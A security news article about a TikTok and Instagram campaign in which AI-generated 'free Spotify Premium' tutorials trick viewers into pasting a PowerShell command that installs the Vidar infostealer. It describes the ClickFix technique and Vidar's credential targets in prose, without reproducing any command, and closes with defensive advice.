TikTok ‘Free Spotify’ Scam Uses ClickFix to Deploy Vidar Malware on DevOps

You might think you’re just watching a "free Spotify Premium" tutorial on TikTok, but your computer could already be infected with the Vidar espionage trojan, targeting developers and ops staff who log into corporate AWS consoles or GitHub Enterprise from personal devices.

1. Attackers Target Your Social Media Feed

ReversingLabs researchers uncovered two active, highly targeted phishing campaigns that have abandoned traditional email phishing. Instead, they post AI‑generated “crack tutorial” videos on TikTok and Instagram Reels, promising free Spotify Premium, permanent Windows activation, or free Microsoft Office.

By tagging videos with popular Windows and Office keywords, the platforms’ algorithms push them to users searching for “how to get free software,” a group that includes many developers and sysadmins who manage production environments on personal machines.

This system has three entry points: the lure video → PowerShell command execution → Vidar espionage trojan. All three steps are fully automated.

2. ClickFix Technique: Victims Trigger the Attack Themselves

The core method, dubbed “ClickFix” in the security community, does not rely on vulnerabilities or malicious email attachments. Instead, attackers craft a web page that convinces victims to run malicious commands themselves.

Attack flow:

Step 1: AI‑generated lure video – Actors mass‑produce seemingly professional “tech tutorial” videos under accounts like “windows.tips” or “windows.insights,” using Windows‑style visuals. The video walks viewers through “three steps to get free Spotify Premium.”

Step 2: Prompt to open PowerShell – The tutorial tells users to open the built‑in Windows PowerShell tool and paste an “activation command,” which is actually the trigger.

Step 3: Silent malicious command execution – The PowerShell snippet downloads and runs Vidar from the attacker’s server, leaving no files on disk and showing no pop‑up warnings.

ReversingLabs reports that the malicious scripts also add exclusions to Windows Defender, whitelisting the malicious directory and making subsequent activity harder to detect.

3. Vidar Trojan: A Credential‑Harvesting Machine for DevOps

The payload is Vidar, a modular infostealer that targets the following data:

Browser‑saved passwords (Chrome, Firefox, Edge)

Browser autofill data

Browser cookies, especially logged‑in sessions

Cryptocurrency wallets (Exodus, MetaMask, etc.)

Two‑factor authentication (2FA) data

TOR browser data

Beyond these, the trojan seeks high‑value cloud credentials:

AWS console credentials (IAM users, access keys)

GitHub Enterprise sessions (repository access tokens)

Enterprise VPN login state

Internal network authentication tokens

Compromising these gives attackers full access to a company’s cloud infrastructure. The authors stress that social engineering—not zero‑day exploits—is the primary weapon, requiring only that the victim run a PowerShell command.

4. Scope and Real‑World Threat

The danger lies in scale rather than technical sophistication. Similar TikTok‑based poisoning campaigns have been reported by multiple national cybersecurity agencies. Research shows the malicious PowerShell scripts have spread globally, affecting ordinary users, developers, and enterprise ops staff.

High‑risk groups include:

Developers who build and maintain cloud infrastructure on personal Macs/PCs

DevOps engineers who log into AWS, Azure, or GCP consoles from personal devices

Anyone who stores corporate intranet credentials in a browser

Remote workers handling work tasks on personal hardware

5. Security Recommendations

While no single fix eliminates the risk, the following measures can reduce the likelihood of infection:

Never download software from unofficial sources (e.g., “free” Spotify Premium, Windows activation keys, cracked video editors).

Avoid executing PowerShell commands on any webpage, especially those with countdown timers or fake user‑count pressure.

Verify digital signatures before running executables: right‑click → Properties → Digital Signatures.

Enterprises should strengthen endpoint detection and require hardware‑based authentication (WebAuthn/FIDO2) instead of password‑only logins for cloud resources.

Deploy real‑time anti‑malware solutions capable of blocking Vidar before it executes.

6. Conclusion

The “free Spotify Premium” TikTok videos may be the entry point that compromises your company’s cloud infrastructure. Attackers are mass‑producing AI‑driven phishing content, using the ClickFix method to bypass security controls, and deploying Vidar to harvest valuable enterprise credentials. This is a targeted, low‑effort, high‑reward campaign aimed at the developer community.

You think you’re getting free Spotify; in reality, you’re the one being harvested.